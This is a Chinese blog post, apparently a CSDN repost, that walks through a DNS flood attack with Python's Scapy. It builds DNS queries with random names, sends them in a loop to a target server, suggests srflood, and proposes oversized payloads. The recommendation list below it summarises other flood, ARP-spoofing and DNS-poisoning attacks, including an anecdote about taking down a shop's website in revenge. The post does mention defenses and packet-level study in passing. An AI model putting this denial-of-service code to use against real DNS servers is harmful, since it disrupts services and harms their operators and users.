Python中的Scapy初探之五-DNS洪水攻击

最新推荐文章于 2024-04-24 11:57:57 发布
最新推荐文章于 2024-04-24 11:57:57 发布
阅读量2.6k 收藏
点赞数
分类专栏: python 文章标签: python 网络
原文地址:Python中的Scapy初探之五-DNS洪水攻击作者:小牛牛

肿么回事,现在肿么都是这些东西?不过看了别人的代码,忍不住留个纪念,对生成随机的数据包有启发,其实,在Scapy有专门的洪水发包的方法

srflood             : Flood and receive packets at layer 3
srloop              : Send a packet at layer 3 in loop and print the answer each time
srp                 : Send and receive packets at layer 2
srp1                : Send and receive packets at layer 2 and return only the first answer
srpflood            : Flood and receive packets at layer 2
srploop             : Send a packet at layer 2 in loop and print the answer each time

改天有时间测试一下

那么如何对DNS服务器进行大量DNS名称解析呢?

首先要构建一个包含随机查询字符串的DNS请求包,主要还是添加qname项

qname一般包含FQDN名称,类似于www.baidu.com,要产生这种格式的名称,以'.'分隔三部分字符串

第一个s1,加上.,然后第二个s2,加上.,最后是第三个s3。那么可以随机产生字符串就ok了

s=RandString(RandNum(1,10))

s1=s.lower()

d=RandString(RandNum(1,10))

s2=d.lower()

t=RandString(RandNum(2,3))

s3=t.lower()

整合起来的字符串就是

q=s1+'.'+s2+'.'+s3

构建一个包

p=IP(dst='dns-server')/UDP(sport=RandShort())/DNS(rd=1,qd=DNSQR(qname=q))

然后send()出去

send(p)

如果可以接收数据包,那么使用srflood()是个不错的选择

send()可以只管发送,不管接收

再加上一个循环,就可以发送n多DNS请求包

想想看,如果将s1与s2的取值扩充成很大,那么发一个巨型的数据包,再循环一下....没看RFC文档,不知道一个DNS包的限定字节数是多少

看了一种方法,就是在TCP层之上,加上超容量的字符

例如TCP()/('xx'*6000000)

这样应该可以了,还没测试过,还需要继续验证

看来服务器的安全真是很重要,还没看到Linux的DNS配置,看看有什么防御方法不

http://www.packetlevel.ch/html/scapy/scapydns.html

http://www.packetlevel.ch/

txyj08
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用python+scapy抓取DNS数据包
06-04
程序只会抓取DNS数据包。不会去抓取其他类型的数据包!
DDoS攻击--Udp/Dns_query Flood攻击防护详解(UDP)
热门推荐
一只IT小小鸟
08-22 2万+
UDP报文结构 UDP_Flood攻击原理 UDP Flood是日渐猖厥的流量型DoS攻击,原理也很简单。常见的情况是利用大量UDP小包冲击DNS服务器或Radius认证服务器、流媒体视频服务器。 100k pps的UDP Flood经常将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪。由于UDP协议是一种无连接的服务,在UDP FLOOD攻击攻击者可发送大量伪造源IP地址的小...
python 实现DoS攻击
有图有真相
05-04 1万+
前言 一 狗店老板欺负我女神,作为一个程序员这如果都能忍那还算男人?得知这个狗店老板买狗网站后果断决定黑了他,看他嚣张不嚣张。我使用的是DOS攻击,没一分钟就把他的网站日瘫了,解气。 DOS DOS拒绝服务攻击(Denial-of-Service Attack)亦称洪水攻击,是一种网络攻击手法,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时断或停止,导致其正常用户无法访问。  ...
[笔记]使用Pythonscapy库实现SYN洪水攻击
qq_61690448的博客
12-22 2005
[笔记]实现SYN泛洪攻击
dns放大攻击python代码_Python使用scapy模拟数据包实现arp攻击dns放大攻击例子...
weixin_42133969的博客
02-01 358
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试。这里就直接用pythonscapy搞。这里是arp的攻击方式,你可以做成arp攻击。#!/usr/bin/python"""ARP attack"""import sys, osfrom scapy.all import *if os.geteuid() != 0:...
netkit-ng+bind+scapy的旁路抢答DNS污染实验报告
12-24
1.使用工具“netkit-ng”在虚拟机(kali linux 2016 amd64)里搭建模拟的网络环境 2.使用pythonscapy模块伪造DNS应答包,并发送给DNS缓存服务器(dns-local),从而污染DNS缓存服务器的缓存记录,使客户端(client)在访问域名“facebook.com”时,接收到来自DNS缓存服务器的已被攻击污染的地址记录。最后使客户端实际访问到的是攻击者的web服务器(attserver)的网页。
PythonScapy初探之四--DNS
txyj08的专栏
08-28 2147
原文地址:PythonScapy初探之四--DNS毒作者:小牛牛 今天做了ARP缓存毒,又看到了DNS毒,觉得比较新鲜。Scapy还真不是盖的 简单来说,DNS毒就是自己做一个应答的DNS包,发送给客户端,这样,客户端就毒了,因为不管发出什么DNS请求解析,得到的都是伪装的DNS应答包,这样就什么都访问不了鸟,这个做起来也非常的简单 Scapy里面有一个工具,就
DNS缓存污染实验】 SEED LAB 远程DNS 缓存毒--Kaminsky 攻击复现
PsgQ的博客
04-11 3264
SEED LAB 远程DNS 缓存毒–Kaminsky 攻击复现 0x00 搭建实验环境 使用3台Ubuntu 16.04虚拟机,可到下面的参考链接下载 攻击的服务是BIND9,由于条件限制,这里使用本地的一台虚拟机当作远程DNS解析器,关闭了DNSSEC服务,其三台机器IP地址,如下图所示: 具体的实验环境搭建过程,可参考:SEED Lab Description 配置User VM: 在用户机 的 /etc/resolvconf/resolv.conf.d/head文件,加入下面语句,将
Python 使用Scapy操作DNS流量
CSDN
10-07 5757
通常一个DNS数据包,客户端发送DNSQR请求包,服务器发送DNSRR响应包。一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。流量,解析DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量。这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。
python scapy dns 包字段解析
weixin_30414155的博客
04-22 1160
qr:     0表示查询报文,1表示响应报文opcode:   通常值为0(标准查询),其他值为1(反向查询)和2(服务器状态请求)。aa:      表示授权回答(authoritative answer)tc:      表示可截断的(truncated)rcode:     返回码,通常为0(没有差错)和3(名字差错)表示期望递归ra:      表示可用递归z:      随后...
python syn攻击
03-14
python语言实现 syn flood攻击
Python使用scapy模拟数据包实现arp攻击dns放大攻击例子
12-23
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试。 这里就直接用pythonscapy搞。 这里是arp的攻击方式,你可以做成arp攻击。 复制...
Python库 | scapy_helper-0.1.9-py3-none-any.whl
04-26
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:scapy_helper-0.1.9-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
python_scapy
03-17
Python 3 Scapy库 重要的 该代码的作者对您的使用或滥用不承担任何责任! 表的内容
Python库 | scapy_helper-0.1.12.tar.gz
05-21
资源分类:Python库 所属语言:Python 资源全名:scapy_helper-0.1.12.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
【编译程序介绍】
武帝为此的博客
04-22 1176
简单来说,编译程序是一个软件,它读取用某种编程语言编写的源代码,分析并转换成等效的、可执行的机器语言代码。这个过程涉及多个复杂的步骤,包括语法分析、语义分析、代码优化和代码生成等。
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 511
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
Pandas 2.2 文官方教程和指南(十五)
最新发布
龙哥盟
04-24 698
原文:pandas.pydata.org/docs/ 处理文本数据 原文:pandas.pydata.org/docs/user_guide/text.html 文本数据类型 在 pandas 有两种存储文本数据的方式: object -dtype NumPy 数组。 StringDtype 扩展类型。 我们建议使用StringDtype来存储文本数据。 在 pandas 1.0 之前,object dtype 是唯一的选项。这在很多方面都是不幸的: 你可能会在object dty
pythonscapy
01-19
Scapy是一个强大的Python库,用于网络数据包的创建、发送、捕获和分析。它可以用于网络协议开发、网络安全评估、网络故障排除等方面。 Scapy提供了一种简单而灵活的方式来构建和发送自定义的网络数据包。它支持构建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值